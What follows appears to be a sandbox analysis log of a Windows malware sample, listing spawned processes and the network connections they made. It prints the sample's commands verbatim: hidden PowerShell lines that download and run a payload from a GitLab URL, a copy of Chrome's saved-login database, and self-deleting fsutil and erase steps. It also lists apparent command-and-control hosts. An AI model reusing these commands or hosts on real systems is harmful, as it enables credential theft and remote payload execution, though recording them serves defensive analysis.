"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe
"C:\Users\Admin\Desktop\2023-09-04\9025cbcf8f758c9c16cf199ecd45576f61b00921701829343a607336b8e9a2cb.exe"
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/brum/teamfor/-/raw/main/Document.zip -OutFile C:\\Users\\Public\\Document.zip;
C:\Users\Admin\AppData\Local\Temp\egvwnmlaao.exe
"C:\Users\Admin\AppData\Local\Temp\egvwnmlaao.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c timeout /nobreak /t 3 & fsutil file setZeroData offset=0 length=7269015 "C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe" & erase "C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 /prefetch:8
C:\Windows\SysWOW64\timeout.exe
timeout /nobreak /t 3
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=7269015 "C:\Users\Admin\Desktop\2023-09-04\e4d5b043f5c9e0894a5f4a21c93cd7347a609a900da8f56f55a0dd84269e81f1.exe"
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Expand-Archive C:\\Users\\Public\\Document.zip -DestinationPath C:\\Users\\Public\\Document;
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5760 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5748 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5332 /prefetch:2
C:\Windows\system32\NETSTAT.EXE
netstat
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\micros.bat" "
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/brum/teamfor/-/raw/main/achung -OutFile C:\\Users\\Public\\Document\\project.py;
C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\\Users\\Public\\Document\\python C:\\Users\\Public\\Document\\project.py;
C:\Windows\SysWOW64\cmd.exe
/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.alibaba.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd465c9758,0x7ffd465c9768,0x7ffd465c9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1744 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2084 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3024 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3016 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"
C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe
"C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"
C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe
"C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe"
C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe
"C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"
C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe
"C:\Program Files (x86)\Zibvxn\colorcplhhd0qj.exe"
C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\micros.ps1'"
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\micros.bat" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2784 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4660 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\micros.ps1'"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:8
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"
C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3368 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 2032
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3460 --field-trial-handle=1888,i,14954713582988396088,10470241304696319683,131072 /prefetch:2
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9062113555123661504,5206091254979989118,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\ProgramData\presepuesto\LEAJ.exe
C:\ProgramData\presepuesto\LEAJ.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\micros.bat" "
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\micros.vbs"
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Users\Admin\AppData\Local\Temp\nnweubxpxnavd.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\micros.ps1'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.207.253.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
| RU | 31.41.244.27:41140 | tcp | |
| US | 8.8.8.8:53 | 27.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | z.nnnaajjjgc.com | udp |
| US | 8.8.8.8:53 | 5.tcp.eu.ngrok.io | udp |
| DE | 3.67.161.133:15312 | 5.tcp.eu.ngrok.io | tcp |
| MU | 156.236.72.121:443 | z.nnnaajjjgc.com | tcp |
| US | 8.8.8.8:53 | 133.161.67.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.72.236.156.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.33.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | app.nnnaajjjgc.com | udp |
| HK | 154.221.26.108:80 | app.nnnaajjjgc.com | tcp |
| US | 8.8.8.8:53 | 108.26.221.154.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| BG | 84.54.50.31:80 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.112.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 63.199.187.89:80 | tcp | |
| IT | 87.11.67.12:80 | tcp | |
| US | 19.71.87.92:80 | tcp | |
| GB | 51.135.15.108:80 | tcp | |
| US | 164.203.92.128:80 | tcp | |
| TW | 42.72.114.100:80 | tcp | |
| US | 205.32.15.92:80 | tcp | |
| US | 137.106.239.133:80 | tcp | |
| US | 34.57.47.28:80 | tcp | |
| US | 67.232.228.250:80 | tcp | |
| US | 216.110.35.192:80 | tcp | |
| DE | 178.16.51.144:80 | tcp | |
| NO | 138.62.146.120:80 | tcp | |
| CN | 110.231.158.240:80 | tcp | |
| HU | 109.61.80.71:80 | tcp | |
| US | 149.119.115.202:8080 | tcp | |
| HU | 109.61.80.71:80 | 109.61.80.71 | tcp |
| US | 8.8.8.8:53 | 71.80.61.109.in-addr.arpa | udp |
| JP | 133.48.58.209:80 | tcp | |
| CN | 110.250.145.63:80 | tcp | |
| US | 21.78.249.105:443 | tcp | |
| US | 137.57.26.124:80 | tcp | |
| RO | 85.186.82.203:80 | tcp | |
| KR | 222.239.221.241:80 | tcp | |
| CA | 142.230.198.74:80 | tcp | |
| US | 55.134.207.25:80 | tcp | |
| US | 64.30.49.119:80 | tcp | |
| US | 152.7.226.187:80 | tcp | |
| US | 139.62.243.79:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 28.4.40.58:8080 | tcp | |
| US | 70.169.69.31:8080 | tcp | |
| US | 26.42.40.101:80 | tcp | |
| GP | 93.121.218.219:80 | tcp | |
| RU | 90.188.116.49:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| DE | 53.158.172.95:80 | tcp | |
| GB | 81.144.143.186:80 | tcp | |
| AT | 212.186.153.64:80 | tcp | |
| US | 26.104.212.28:80 | tcp | |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.6:443 | api.github.com | tcp |
| BG | 193.42.32.237:2404 | tcp | |
| IN | 118.94.114.123:80 | tcp | |
| US | 8.8.8.8:53 | 6.114.82.140.in-addr.arpa | udp |
| CN | 122.226.168.210:8080 | tcp | |
| US | 192.3.179.161:80 | 192.3.179.161 | tcp |
| IL | 89.138.94.60:80 | tcp | |
| US | 147.116.195.79:80 | tcp | |
| US | 8.8.8.8:53 | 161.179.3.192.in-addr.arpa | udp |
| MU | 137.63.88.203:80 | tcp | |
| US | 65.17.42.137:80 | tcp | |
| BG | 193.42.32.237:2404 | tcp | |
| US | 16.153.161.105:80 | tcp | |
